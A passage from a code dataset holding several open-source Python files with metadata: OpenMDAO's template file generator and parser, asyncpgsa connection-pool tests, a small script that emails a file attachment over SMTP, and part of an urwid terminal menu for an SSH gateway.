return float('inf')\n\n\nclass InputFileGenerator(object):\n \"\"\"\n Utility to generate an input file from a template.\n\n Substitution of values is supported. Data is located with a simple API.\n\n Attributes\n ----------\n _template_filename : str or None\n the name of the template file.\n _output_filename : str or None\n the name of the output file.\n _delimiter : int\n delimiter.\n _reg : int\n regular expression.\n _data : list of string\n the contents of the file, by line\n _current_row : int\n the current row of the file\n _anchored : bool\n indicator that position is relative to a landmark location.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Initialize attributes.\n \"\"\"\n if pyparsing is None:\n raise RuntimeError(\"The 'pyparsing' package is required to use the file wrapping \"\n \"utilities but it is not installed. Try 'pip install pyparsing'.\")\n\n self._template_filename = None\n self._output_filename = None\n\n self._delimiter = \" \"\n self._reg = re.compile('[^ \\n]+')\n\n self._data = []\n self._current_row = 0\n self._anchored = False\n\n def set_template_file(self, filename):\n \"\"\"\n Set the name of the template file to be used.\n\n The template file is also read into memory when this method is called.\n\n Parameters\n ----------\n filename : str\n Name of the template file to be used.\n \"\"\"\n self._template_filename = filename\n\n templatefile = open(filename, 'r')\n self._data = templatefile.readlines()\n templatefile.close()\n\n def set_generated_file(self, filename):\n \"\"\"\n Set the name of the file that will be generated.\n\n Parameters\n ----------\n filename : str\n Name of the input file to be generated.\n \"\"\"\n self._output_filename = filename\n\n def set_delimiters(self, delimiter):\n \"\"\"\n Set the delimiters that are used to identify field boundaries.\n\n Parameters\n ----------\n delimiter : str\n A string containing characters to be used as delimiters.\n \"\"\"\n self._delimiter = delimiter\n self._reg = re.compile('[^' + delimiter + '\\n]+')\n\n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"\n Mark the location of a landmark.\n\n This lets you describe data by relative position. Note that a forward\n search begins at the old anchor location. If you want to restart the\n search for the anchor at the file beginning, then call ``reset_anchor()``\n before ``mark_anchor``.\n\n Parameters\n ----------\n anchor : str\n The text you want to search for.\n\n occurrence : int, optional\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\n \"\"\"\n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n\n instance = 0\n if occurrence > 0:\n count = 0\n max_lines = len(self._data)\n for index in range(self._current_row, max_lines):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self._anchored:\n line = line.split(anchor)[-1]\n\n if line.find(anchor) > -1:\n\n instance += 1\n if instance == occurrence:\n self._current_row += count\n self._anchored = True\n return\n\n count += 1\n\n elif occurrence < 0:\n max_lines = len(self._data) - 1\n count = max_lines\n for index in range(max_lines, -1, -1):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == max_lines and self._anchored:\n line = line.split(anchor)[0]\n\n if line.find(anchor) > -1:\n instance += -1\n if instance == occurrence:\n self._current_row = count\n self._anchored = True\n return\n\n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n\n raise RuntimeError(\"Could not find pattern %s in template file %s\" %\n (anchor, self._template_filename))\n\n def reset_anchor(self):\n \"\"\"\n Reset anchor to the beginning of the file.\n \"\"\"\n self._current_row = 0\n self._anchored = False\n\n def transfer_var(self, value, row, field):\n \"\"\"\n Change a single variable in the template relative to the current anchor.\n\n Parameters\n ----------\n value : float, int, bool, str\n New value to set at the location.\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n field : int\n Which word in line to replace, as denoted by delimiter(s).\n \"\"\"\n j = self._current_row + row\n line = self._data[j]\n\n sub = _SubHelper()\n sub.set(value, field)\n newline = re.sub(self._reg, sub.replace, line)\n\n self._data[j] = newline\n\n def transfer_array(self, value, row_start, field_start, field_end,\n row_end=None, sep=\", \"):\n \"\"\"\n Change the values of an array in the template relative to the current anchor.\n\n This should generally be used for one-dimensional or free form arrays.\n\n Parameters\n ----------\n value : float, int, bool, str\n Array of values to insert.\n row_start : int\n Starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n field_start : int\n Starting field in the given row_start as denoted by\n delimiter(s).\n field_end : int\n The final field the array uses in row_end.\n We need this to figure out if the template is too small or large.\n row_end : int, optional\n Use if the array wraps to cover additional lines.\n sep : int, optional\n Separator to use if we go beyond the template.\n \"\"\"\n # Simplified input for single-line arrays\n if row_end is None:\n row_end = row_start\n\n sub = _SubHelper()\n\n for row in range(row_start, row_end + 1):\n j = self._current_row + row\n line = self._data[j]\n\n if row == row_end:\n f_end = field_end\n else:\n f_end = 99999\n\n sub.set_array(value, field_start, f_end)\n field_start = 0\n\n newline = re.sub(self._reg, sub.replace_array, line)\n self._data[j] = newline\n\n # Sometimes an array is too large for the example in the template\n # This is resolved by adding more fields at the end\n if sub._counter < len(value):\n for val in value[sub._counter:]:\n newline = newline.rstrip() + sep + str(val)\n self._data[j] = newline\n\n # Sometimes an array is too small for the template\n # This is resolved by removing fields\n elif sub._counter > len(value):\n # TODO - Figure out how to handle this.\n # Ideally, we'd remove the extra field placeholders\n raise ValueError(\"Array is too small for the template.\")\n\n def transfer_2Darray(self, value, row_start, row_end, field_start, field_end):\n \"\"\"\n Change the values of a 2D array in the template relative to the current anchor.\n\n This method is specialized for 2D arrays, where each row of the array is\n on its own line.\n\n Parameters\n ----------\n value : ndarray\n Array of values to insert.\n row_start : int\n Starting row for inserting the array. This is relative\n to the anchor, and can be negative.\n row_end : int\n Final row for the array, relative to the anchor.\n field_start : int\n Starting field in the given row_start as denoted by\n delimiter(s).\n field_end : int\n The final field the array uses in row_end.\n We need this to figure out if the template is too small or large.\n \"\"\"\n sub = _SubHelper()\n\n i = 0\n\n for row in range(row_start, row_end + 1):\n j = self._current_row + row\n line = self._data[j]\n\n sub.set_array(value[i, :], field_start, field_end)\n\n newline = re.sub(self._reg, sub.replace_array, line)\n self._data[j] = newline\n\n sub._current_location = 0\n sub._counter = 0\n i += 1\n\n # TODO - Note, we currently can't handle going beyond the end of\n # the template line\n\n def clearline(self, row):\n \"\"\"\n Replace the contents of a row with the newline character.\n\n Parameters\n ----------\n row : int\n Row number to clear, relative to current anchor.\n \"\"\"\n self._data[self._current_row + row] = \"\\n\"\n\n def generate(self, return_data=False):\n \"\"\"\n Use the template file to generate the input file.\n\n Parameters\n ----------\n return_data : bool\n If True, generated file data will be returned as a string.\n\n Returns\n -------\n string\n The generated file data if return_data is True or output filename\n has not been provided, else None.\n \"\"\"\n if self._output_filename:\n with open(self._output_filename, 'w') as f:\n f.writelines(self._data)\n else:\n return_data = True\n\n if return_data:\n return '\\n'.join(self._data)\n else:\n return None\n\n\nclass FileParser(object):\n \"\"\"\n Utility to locate and read data from a file.\n\n Parameters\n ----------\n end_of_line_comment_char : str, optional\n End-of-line comment character to be ignored\n (e.g., Python supports in-line comments with \"#\").\n\n full_line_comment_char : str, optional\n Comment character that signifies a line should be skipped.\n\n Attributes\n ----------\n _filename : str\n the name of the file.\n _data : list of string\n the contents of the file, by line\n _delimiter : str\n the name of the file.\n _end_of_line_comment_char : str\n end-of-line comment character to be ignored.\n _full_line_comment_char : str\n comment character that signifies a line should be skipped.\n _current_row : int\n the current row of the file.\n _anchored : bool\n indicator that position is relative to a landmark location.\n \"\"\"\n\n def __init__(self, end_of_line_comment_char=None, full_line_comment_char=None):\n \"\"\"\n Initialize attributes.\n \"\"\"\n if pyparsing is None:\n raise RuntimeError(\"The 'pyparsing' package is required to use the file wrapping \"\n \"utilities but it is not installed. Try 'pip install pyparsing'.\")\n\n self._filename = None\n self._data = []\n\n self._delimiter = \" \\t\"\n self._end_of_line_comment_char = end_of_line_comment_char\n self._full_line_comment_char = full_line_comment_char\n\n self._current_row = 0\n self._anchored = False\n\n self.set_delimiters(self._delimiter)\n\n def set_file(self, filename):\n \"\"\"\n Set the name of the file that will be generated.\n\n Parameters\n ----------\n filename : str\n Name of the input file to be generated.\n \"\"\"\n self._filename = filename\n\n inputfile = open(filename, 'r')\n\n if not self._end_of_line_comment_char and not self._full_line_comment_char:\n self._data = inputfile.readlines()\n else:\n self._data = []\n for line in inputfile:\n if line[0] == self._full_line_comment_char:\n continue\n self._data.append(line.split(self._end_of_line_comment_char)[0])\n\n inputfile.close()\n\n def set_delimiters(self, delimiter):\n r\"\"\"\n Set the delimiters that are used to identify field boundaries.\n\n Parameters\n ----------\n delimiter : str\n A string containing characters to be used as delimiters. The\n default value is ' \\t', which means that spaces and tabs are not\n taken as data but instead mark the boundaries. Note that the\n parser is smart enough to recognize characters within quotes as\n non-delimiters.\n \"\"\"\n self._delimiter = delimiter\n\n if delimiter != \"columns\":\n ParserElement.setDefaultWhitespaceChars(str(delimiter))\n\n self._reset_tokens()\n\n def mark_anchor(self, anchor, occurrence=1):\n \"\"\"\n Mark the location of a landmark, which lets you describe data by relative position.\n\n Note that a forward search begins at the old anchor location. If you want to restart\n the search for the anchor at the file beginning, then call ``reset_anchor()`` before\n ``mark_anchor``.\n\n Parameters\n ----------\n anchor : str\n The text you want to search for.\n occurrence : int\n Find nth instance of text; default is 1 (first). Use -1 to\n find last occurrence. Reverse searches always start at the end\n of the file no matter the state of any previous anchor.\n \"\"\"\n if not isinstance(occurrence, int):\n raise ValueError(\"The value for occurrence must be an integer\")\n\n instance = 0\n\n if occurrence > 0:\n count = 0\n max_lines = len(self._data)\n for index in range(self._current_row, max_lines):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only after the anchor.\n if count == 0 and self._anchored:\n line = line.split(anchor)[-1]\n\n if anchor in line:\n\n instance += 1\n if instance == occurrence:\n self._current_row += count\n self._anchored = True\n return\n\n count += 1\n\n elif occurrence < 0:\n max_lines = len(self._data) - 1\n count = max_lines\n for index in range(max_lines, -1, -1):\n line = self._data[index]\n\n # If we are marking a new anchor from an existing anchor, and\n # the anchor is mid-line, then we still search the line, but\n # only before the anchor.\n if count == max_lines and self._anchored:\n line = line.split(anchor)[0]\n\n if anchor in line:\n instance += -1\n if instance == occurrence:\n self._current_row = count\n self._anchored = True\n return\n\n count -= 1\n else:\n raise ValueError(\"0 is not valid for an anchor occurrence.\")\n\n raise RuntimeError(\"Could not find pattern %s in output file %s\" %\n (anchor, self._filename))\n\n def reset_anchor(self):\n \"\"\"\n Reset anchor to the beginning of the file.\n \"\"\"\n self._current_row = 0\n self._anchored = False\n\n def transfer_line(self, row):\n \"\"\"\n Return an entire line, relative to current anchor.\n\n Parameters\n ----------\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n\n Returns\n -------\n string\n Line at the location requested.\n \"\"\"\n return self._data[self._current_row + row].rstrip()\n\n def transfer_var(self, row, field, fieldend=None):\n \"\"\"\n Get a single variable relative to the current anchor.\n\n Parameters\n ----------\n row : int\n Number of lines offset from anchor line (0 is anchor line).\n This can be negative.\n field : int\n If the delimiter is a set of chars: which word in line to retrieve.\n If the delimiter is 'columns': character position to start.\n fieldend : int (optional)\n If the delimiter is a set of chars: IGNORED.\n If the delimiter is 'columns': position of last character to return, or if\n omitted, the end of the line is used.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n j = self._current_row + row\n\n line = self._data[j]\n\n if self._delimiter == \"columns\":\n if not fieldend:\n line = line[(field - 1):]\n else:\n line = line[(field - 1):(fieldend)]\n\n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n data = self._parse_line().parseString(line)\n\n # data might have been split if it contains whitespace. If so,\n # just return the whole string\n if len(data) > 1:\n return line\n else:\n return data[0]\n else:\n data = self._parse_line().parseString(line)\n return data[field - 1]\n\n def transfer_keyvar(self, key, field, occurrence=1, rowoffset=0):\n \"\"\"\n Search for a key relative to the current anchor and get a field from that line.\n\n You can do the same thing with a call to ``mark_anchor`` and ``transfer_var``.\n This function just combines them for convenience.\n\n Parameters\n ----------\n key : str\n The key to search for.\n field : int\n Which field to transfer. Field 0 is the key.\n occurrence : int\n Find nth instance of text; default is 1 (first value\n field). Use -1 to find last occurance. Position 0 is the key\n field, so it should not be used as a value for occurrence.\n rowoffset : int (optional)\n Optional row offset from the occurrence of key. This can\n also be negative.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n if not isinstance(occurrence, int) or occurrence == 0:\n msg = \"The value for occurrence must be a nonzero integer\"\n raise ValueError(msg)\n\n instance = 0\n if occurrence > 0:\n row = 0\n for line in self._data[self._current_row:]:\n if line.find(key) > -1:\n instance += 1\n if instance == occurrence:\n break\n row += 1\n\n elif occurrence < 0:\n row = -1\n for line in reversed(self._data[self._current_row:]):\n if line.find(key) > -1:\n instance += -1\n if instance == occurrence:\n break\n row -= 1\n\n j = self._current_row + row + rowoffset\n line = self._data[j]\n\n fields = self._parse_line().parseString(line.replace(key, \"KeyField\"))\n\n return fields[field]\n\n def transfer_array(self, rowstart, fieldstart, rowend=None, fieldend=None):\n \"\"\"\n Get an array of variables relative to the current anchor.\n\n Setting the delimiter to 'columns' elicits some special behavior\n from this method. Normally, the extraction process wraps around\n at the end of a line and continues grabbing each field at the start of\n a newline. When the delimiter is set to columns, the parameters\n (rowstart, fieldstart, rowend, fieldend) demark a box, and all\n values in that box are retrieved. Note that standard whitespace\n is the secondary delimiter in this case.\n\n Parameters\n ----------\n rowstart : int\n Row number to start, relative to the current anchor.\n fieldstart : int\n Field number to start.\n rowend : int, optional\n Row number to end. If not set, then only one row is grabbed.\n fieldend : int\n Field number to end.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n j1 = self._current_row + rowstart\n\n if rowend is None:\n j2 = j1 + 1\n else:\n j2 = self._current_row + rowend + 1\n\n if not fieldend:\n raise ValueError(\"fieldend is missing, currently required\")\n\n lines = self._data[j1:j2]\n\n data = np.zeros(shape=(0, 0))\n\n for i, line in enumerate(lines):\n if self._delimiter == \"columns\":\n line = line[(fieldstart - 1):fieldend]\n\n # Stripping whitespace may be controversial.\n line = line.strip()\n\n # Let pyparsing figure out if this is a number, and return it\n # as a float or int as appropriate\n parsed = self._parse_line().parseString(line)\n\n newdata = np.array(parsed[:])\n # data might have been split if it contains whitespace. If the\n # data is string, we probably didn't want this.\n if newdata.dtype.type is np.str_:\n newdata = np.array(line)\n\n data = np.append(data, newdata)\n else:\n parsed = self._parse_line().parseString(line)\n\n if i == j2 - j1 - 1:\n data = np.append(data, np.array(parsed[(fieldstart - 1):fieldend]))\n else:\n data = np.append(data, np.array(parsed[(fieldstart - 1):]))\n\n fieldstart = 1\n\n return data\n\n def transfer_2Darray(self, rowstart, fieldstart, rowend, fieldend=None):\n \"\"\"\n Get a 2D array of variables relative to the current anchor.\n\n Each line of data is placed in a separate row.\n\n If the delimiter is set to 'columns', then the values contained in\n fieldstart and fieldend should be the column number instead of the\n field number.\n\n Parameters\n ----------\n rowstart : int\n Row number to start, relative to the current anchor.\n fieldstart : int\n Field number to start.\n rowend : int\n Row number to end relative to current anchor.\n fieldend : int (optional)\n Field number to end. If not specified, grabs all fields up to the\n end of the line.\n\n Returns\n -------\n string\n Data from the requested location in the file.\n \"\"\"\n if fieldend and (fieldstart > fieldend):\n msg = \"fieldend must be greater than fieldstart\"\n raise ValueError(msg)\n\n if rowstart > rowend:\n msg = \"rowend must be greater than rowstart\"\n raise ValueError(msg)\n\n j1 = self._current_row + rowstart\n j2 = self._current_row + rowend + 1\n lines = list(self._data[j1:j2])\n\n if self._delimiter == \"columns\":\n if fieldend:\n line = lines[0][(fieldstart - 1):fieldend]\n else:\n line = lines[0][(fieldstart - 1):]\n\n parsed = self._parse_line().parseString(line)\n row = np.array(parsed[:])\n data = np.zeros(shape=(abs(j2 - j1), len(row)))\n data[0, :] = row\n\n for i, line in enumerate(list(lines[1:])):\n if fieldend:\n line = line[(fieldstart - 1):fieldend]\n else:\n line = line[(fieldstart - 1):]\n\n parsed = self._parse_line().parseString(line)\n data[i + 1, :] = np.array(parsed[:])\n else:\n parsed = self._parse_line().parseString(lines[0])\n if fieldend:\n row = np.array(parsed[(fieldstart - 1):fieldend])\n else:\n row = np.array(parsed[(fieldstart - 1):])\n\n data = np.zeros(shape=(abs(j2 - j1), len(row)))\n data[0, :] = row\n\n for i, line in enumerate(list(lines[1:])):\n parsed = self._parse_line().parseString(line)\n\n if fieldend:\n try:\n data[i + 1, :] = np.array(parsed[(fieldstart - 1):fieldend])\n except Exception:\n print(data)\n else:\n data[i + 1, :] = np.array(parsed[(fieldstart - 1):])\n\n return data\n\n def _parse_line(self):\n \"\"\"\n Parse a single data line that may contain string or numerical data.\n\n Float and Int 'words' are converted to their appropriate type.\n Exponentiation is supported, as are NaN and Inf.\n\n Returns\n -------\n \n the parsed line.\n \"\"\"\n return self.line_parse_token\n\n def _reset_tokens(self):\n \"\"\"\n Set up the tokens for pyparsing.\n \"\"\"\n # Somewhat of a hack, but we can only use printables if the delimiter is\n # just whitespace. Otherwise, some seprators (like ',' or '=') potentially\n # get parsed into the general string text. So, if we have non whitespace\n # delimiters, we need to fall back to just alphanums, and then add in any\n # missing but important symbols to parse.\n if self._delimiter.isspace():\n textchars = printables\n else:\n textchars = alphanums\n\n symbols = ['.', '/', '+', '*', '^', '(', ')', '[', ']', '=',\n ':', ';', '?', '%', '&', '!', '#', '|', '<', '>',\n '{', '}', '-', '_', '@', '$', '~']\n\n for symbol in symbols:\n if symbol not in self._delimiter:\n textchars = textchars + symbol\n\n digits = Word(nums)\n dot = \".\"\n sign = oneOf(\"+ -\")\n ee = CaselessLiteral('E') | CaselessLiteral('D')\n\n num_int = _ToInteger(Combine(Optional(sign) + digits))\n\n num_float = _ToFloat(Combine(\n Optional(sign) +\n ((digits + dot + Optional(digits)) | (dot + digits)) +\n Optional(ee + Optional(sign) + digits)\n ))\n\n # special case for a float written like \"3e5\"\n mixed_exp = _ToFloat(Combine(digits + ee + Optional(sign) + digits))\n\n nan = (_ToInf(oneOf(\"Inf -Inf\")) |\n _ToNan(oneOf(\"NaN nan NaN% NaNQ NaNS qNaN sNaN 1.#SNAN 1.#QNAN -1.#IND\")))\n\n string_text = Word(textchars)\n\n self.line_parse_token = (OneOrMore((nan | num_float | mixed_exp | num_int | string_text)))\n", "repo_name": "OpenMDAO/OpenMDAO", "sub_path": "openmdao/utils/file_wrap.py", "file_name": "file_wrap.py", "file_ext": "py", "file_size_in_byte": 34305, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 451, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyparsing.TokenConverter", "line_number": 16, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 170, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 196, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 222, "usage_type": "name"}, {"api_name": "pyparsing.TokenConverter", "line_number": 248, "usage_type": "name"}, {"api_name": "re.compile", "line_number": 310, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 354, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 453, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 500, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 550, "usage_type": "call"}, {"api_name": "pyparsing.ParserElement.setDefaultWhitespaceChars", "line_number": 689, "usage_type": "call"}, {"api_name": "pyparsing.ParserElement", "line_number": 689, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 929, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 942, "usage_type": "call"}, {"api_name": "numpy.str_", "line_number": 945, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 946, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 948, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 953, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 955, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1007, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1008, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1018, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1022, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1024, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1026, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1034, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 1038, "usage_type": "call"}, {"api_name": "pyparsing.printables", "line_number": 1066, "usage_type": "name"}, {"api_name": "pyparsing.alphanums", "line_number": 1068, "usage_type": "name"}, {"api_name": "pyparsing.Word", "line_number": 1078, "usage_type": "call"}, {"api_name": "pyparsing.nums", "line_number": 1078, "usage_type": "argument"}, {"api_name": "pyparsing.oneOf", "line_number": 1080, "usage_type": "call"}, {"api_name": "pyparsing.CaselessLiteral", "line_number": 1081, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1083, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1083, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1085, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1086, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1087, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1088, "usage_type": "call"}, {"api_name": "pyparsing.Combine", "line_number": 1092, "usage_type": "call"}, {"api_name": "pyparsing.Optional", "line_number": 1092, "usage_type": "call"}, {"api_name": "pyparsing.oneOf", "line_number": 1094, "usage_type": "call"}, {"api_name": "pyparsing.oneOf", "line_number": 1095, "usage_type": "call"}, {"api_name": "pyparsing.Word", "line_number": 1097, "usage_type": "call"}, {"api_name": "pyparsing.OneOrMore", "line_number": 1099, "usage_type": "call"}]}
+{"seq_id": "35151197031", "text": "import sqlalchemy as sa\n\n\nasync def test_pool_basic(pool):\n async with pool.acquire() as con:\n result = await con.fetch('SELECT * FROM sqrt(16)')\n assert result[0]['sqrt'] == 4.0\n\n\nasync def test_pool_connection_transaction_context_manager(pool):\n async with pool.transaction() as conn:\n result = await conn.fetch('SELECT * FROM sqrt(16)')\n\n assert result[0]['sqrt'] == 4.0\n\n\nasync def test_use_sqlalchemy_with_escaped_params(pool):\n \"\"\"\n Use sqlalchemy with escaped params\n Make sure that the escaped parameters get used in the right order\n :return:\n \"\"\"\n query = sa.select('*') \\\n .select_from(sa.text('sqrt(:num) as a')) \\\n .select_from(sa.text('sqrt(:a2) as b')) \\\n .select_from(sa.text('sqrt(:z3) as c')) \\\n .params(num=16, a2=36, z3=25)\n async with pool.transaction() as conn:\n result = await conn.fetch(query)\n\n row = result[0]\n assert row['a'] == 4.0\n assert row['b'] == 6.0\n assert row['c'] == 5.0\n\n\nasync def test_use_sa_core_objects(pool):\n pg_tables = sa.Table(\n 'pg_tables', sa.MetaData(),\n sa.Column('schemaname'),\n sa.Column('tablename'),\n sa.Column('tableowner'),\n sa.Column('tablespace'),\n sa.Column('hasindexes')\n )\n\n query = pg_tables.select().where(pg_tables.c.schemaname == 'pg_catalog')\n async with pool.transaction() as conn:\n result = await conn.fetch(query)\n\n for row in result:\n # just making sure none of these throw KeyError exceptions\n assert isinstance(row['schemaname'], str)\n assert 'tablename' in row\n assert 'tableowner' in row\n assert 'tablespace' in row\n assert 'hasindexes' in row\n\n\nasync def test_with_without_async_should_throw_exception(pool):\n try:\n with pool.transaction() as conn:\n result = await conn.fetch('SELECT * FROM sqrt(16)')\n\n raise Exception('Should have thrown RuntimeError')\n except RuntimeError as e:\n assert str(e) == 'Must use \"async with\" for a transaction'\n\nasync def test_falsyness_of_rows_on_fetch(pool):\n async with pool.acquire() as conn:\n rows = await conn.fetch('SELECT * FROM pg_stat_activity '\n 'WHERE pid=400')\n assert bool(rows) == False\n", "repo_name": "CanopyTax/asyncpgsa", "sub_path": "tests/test_pool.py", "file_name": "test_pool.py", "file_ext": "py", "file_size_in_byte": 2300, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 411, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sqlalchemy.select", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.text", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.Table", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlalchemy.MetaData", "line_number": 39, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 40, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 41, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 43, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "30647574825", "text": "import smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email import encoders\n\n\ndef send_email(my_email):\n fromaddr = my_email.fromaddr\n toaddr = my_email.toaddr\n msg = MIMEMultipart()\n msg['From'] = fromaddr\n msg['To'] = toaddr\n msg['Subject'] = \"Subject of the Mail\"\n body = \"Body_of_the_mail\"\n msg.attach(MIMEText(body, 'plain'))\n filename = my_email.filepath.rpartition('\\\\')[-1]\n attachment = open(my_email.filepath, \"rb\")\n p = MIMEBase('application', 'octet-stream')\n p.set_payload(attachment.read())\n encoders.encode_base64(p)\n p.add_header('Content-Disposition', \"attachment; filename= %s\" % filename)\n msg.attach(p)\n s = smtplib.SMTP('smtp.gmail.com', 587)\n s.ehlo()\n s.starttls()\n s.login(fromaddr, my_email.password)\n text = msg.as_string()\n s.sendmail(fromaddr, toaddr, text)\n s.quit()\n\ndef main(my_email):\n send_email(my_email)\n\nif __name__ == '__main__':\n main(my_email)", "repo_name": "petyapython/pack_and_send", "sub_path": "send.py", "file_name": "send.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 11, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 16, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 19, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 21, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 21, "usage_type": "name"}, {"api_name": "smtplib.SMTP", "line_number": 24, "usage_type": "call"}]}
+{"seq_id": "3054141243", "text": "__license__ = \"AGPLv3\"\n__author__ = 'Ahmed Nazmy '\n\n\nimport urwid\nimport aker\nimport signal\nimport logging\nimport os\nfrom popup import SimplePopupLauncher\n\n\nclass Listing(urwid.ListBox):\n \"\"\"\n Base class to handle listbox actions\n \"\"\"\n\n def __init__(self, items=None):\n self.search = Search()\n self.search.update_text(\"Type to search:\\n\")\n self._items = []\n if items is not None:\n for item in items:\n listitem = MenuItem(\"%s\" % (item))\n self._items.append(\n urwid.AttrMap(\n listitem,\n 'body',\n focus_map='SSH_focus'))\n super(Listing, self).__init__(urwid.SimpleFocusListWalker(self._items))\n\n def updatelist(self, items):\n self.empty()\n for item in items:\n self.add_item(item)\n\n def add_item(self, item):\n listitem = MenuItem(\"%s\" % (item))\n self.body.append(\n urwid.AttrMap(\n listitem,\n 'body',\n focus_map='SSH_focus'))\n\n def empty(self):\n del self.body[:] # clear listbox\n\n def get_selected(self):\n return self.focus\n\n def get_box(self):\n self.search.clear()\n return urwid.Frame(urwid.AttrWrap(self, 'body'), header=self.search)\n\n\nclass HostList(Listing):\n \"\"\"\n Class to handle hosts screen actions,\n keypresses for now.\n \"\"\"\n\n def __init__(self, hosts=None):\n super(HostList, self).__init__(hosts)\n\n def keypress(self, size, key):\n if (key == 'enter') or (key == 'right'):\n urwid.emit_signal(\n self,\n 'connect',\n self.focus.original_widget.get_caption())\n key = None\n elif key == 'esc':\n if self.search.get_edit_text() == \"\":\n key = 'left'\n else:\n self.search.clear()\n key = None\n # Unless its arrow keys send keypress to search box,\n # implies emitting EditBox \"change\" signal\n elif key not in ['right', 'down', 'up', 'left', 'page up', 'page down']:\n self.search.keypress((10,), key)\n return super(HostList, self).keypress(size, key)\n\n\nclass HostGroupList(Listing):\n \"\"\"\n Class to handle hostgroups screen actions,\n keypresses for now.\n \"\"\"\n\n def __init__(self, hostgroups=None):\n super(HostGroupList, self).__init__(hostgroups)\n\n def keypress(self, size, key):\n if (key == 'enter') or (key == 'right'):\n # emit signal to call hostgroup_chosen_handler with MenuItem caption,\n # caption is group name showing on screen\n if self.focus is not None:\n urwid.emit_signal(\n self,\n 'group_chosen',\n self.focus.original_widget.get_caption())\n key = None\n elif key == 'esc':\n self.search.clear()\n key = None\n # Unless its arrow keys send keypress to search box,\n # implies emitting EditBox \"change\" signal\n elif key not in ['right', 'down', 'up', 'left', 'page up', 'page down']:\n self.search.keypress((10,), key)\n return super(HostGroupList, self).keypress(size, key)\n\n\nclass Header(urwid.Columns):\n def __init__(self, text):\n self.text = text\n self.header_widget = urwid.Text(self.text, align='left')\n self.popup = SimplePopupLauncher()\n self.popup_padding = urwid.Padding(self.popup, 'right', 20)\n self.popup_map = urwid.AttrMap(self.popup_padding, 'indicator')\n self.header_map = urwid.AttrMap(self.header_widget, 'head')\n super(Header, self).__init__([self.header_map, self.popup_map])\n\n def update_text(self, text):\n self.text = text\n self.header_map.original_widget.set_text(self.text)\n\n def popup_message(self, message):\n logging.debug(\"TUI: popup message is {0}\".format(message))\n self.popup.message = str(message)\n self.popup.open_pop_up()\n\n\nclass 